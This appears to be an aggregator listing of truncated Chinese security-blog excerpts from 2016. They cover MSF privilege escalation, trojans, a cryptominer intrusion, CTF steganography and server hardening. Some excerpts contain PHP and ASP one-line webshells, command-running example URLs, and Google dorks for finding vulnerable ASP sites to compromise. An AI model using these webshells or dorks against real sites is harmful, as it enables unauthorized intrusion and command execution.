在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门。 然后在到MSF根据刚才配置的木马后门进行监听... 然后在把木马上传到服务器(受害者)的机器里,必须上传 ...
分类:
其他好文 时间:
2016-08-14 16:13:34
阅读次数:
409
win7中打开文件夹会重新打开一个窗口的问题 在网上查了些资料,一般用到dos环境设置和修改注册表居多,但这两种方式都比较麻烦,尤其对于对计算机不是很懂的同事来说更是火上浇油。其实这种问题都是IE出了问题,下面总结两种非常简单易行的方法:www.2cto.com 1 使用360查杀木马,完了后它会提 ...
前言 前面我们已经学习了病毒免杀技术的特征码免杀了,但是木马大家是不是感觉还是很神秘呢,接下来就让我为大家揭开木马的神秘面纱。 一、基础知识 1.1、木马病毒 木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事 ...
分类:
其他好文 时间:
2016-08-13 06:34:29
阅读次数:
212
服务器出现异常,完全无法访问,ssh登陆都极其缓慢 解决过程 top 查看系统状态,发现 load average 平均负载值非常高,再看排名第一的进程,是一个不认识的进程名:minerd 感觉是被入侵了,上网搜了下minerd是什么东西,是个挖矿程序,看来的确被入侵了,被抓来当矿工了 查看进程信息 ...
分类:
系统相关 时间:
2016-08-10 20:42:07
阅读次数:
332
天前 天前 天前 谷歌地址 https://g.alexyang.me/ 到GoogLe,搜索一些关键字,edit.asp?韩国肉鸡为多,多数为MSSQL数据库!2,到Google,site:cq.cninurl:asp3,利用挖掘鸡和一个ASP木马.文件名是login.asp路径组是/manage ...
分类:
Web程序 时间:
2016-08-05 11:24:40
阅读次数:
379
今天在放肆网络论坛逛得时候,打开帖子发现一个木马下载弹窗,起初还以为是别的页面弹窗的,后来经验证确实是放肆网络论坛的估计是被挂马了吧~但是小编想吐槽的是:挂马不是这样挂的亲~目测小白。。。直接iframer。。。。而且直接就用hfs下载地址,自己的服务器就暴露了,看了下hfs的版本信息,是2.3be ...
分类:
其他好文 时间:
2016-08-01 19:04:53
阅读次数:
217
约束文件类型 实例: 上传txt 上传php文件 <?php phpinfo(); ?> 上传木马 <?php system($_get['cmd']);?> www.xxxx.ma.php?cmd=dir d:\ www.xxxx.ma.php?cmd=shuntdown 新建用户 net use ...
分类:
Web程序 时间:
2016-07-31 22:12:42
阅读次数:
204
Notepad++查看,发现图片PS痕迹。其实是废话 属性查看为空 stegsolve一无所获 PICASA查看属性一无所获 16进制查看发现在结束标识符后还有数据: <%execute request("images")%> 这太扯了这不就是一句话木马吗 KEY提示说SHA1 。尝试加密。居然过了 ...
分类:
其他好文 时间:
2016-07-31 11:30:45
阅读次数:
162
1概述该文档总结了分销商城的安全配置1.1简介利用aliyun云盾服务,防DDOS/CC攻击工具,linux自带的IPtables1.2线上环境介绍服务器OS:CentOS7应用:mariadb-5.5,nginx-1.8,tomcat-8.0,php-5.61.3端口总览2.aliyun云盾服务2.1开启web目录减产,木马查杀功能2.2漏洞补丁管理系..
分类:
系统相关 时间:
2016-07-29 19:47:26
阅读次数:
311
1概述该文档总结了分销商城的安全配置1.1简介利用aliyun云盾服务,防DDOS/CC攻击工具,linux自带的IPtables1.2线上环境介绍服务器OS:CentOS7应用:mariadb-5.5,nginx-1.8,tomcat-8.0,php-5.61.3端口总览2.aliyun云盾服务2.1开启web目录减产,木马查杀功能2.2漏洞补丁管理系..
分类:
系统相关 时间:
2016-07-29 19:46:57
阅读次数:
301
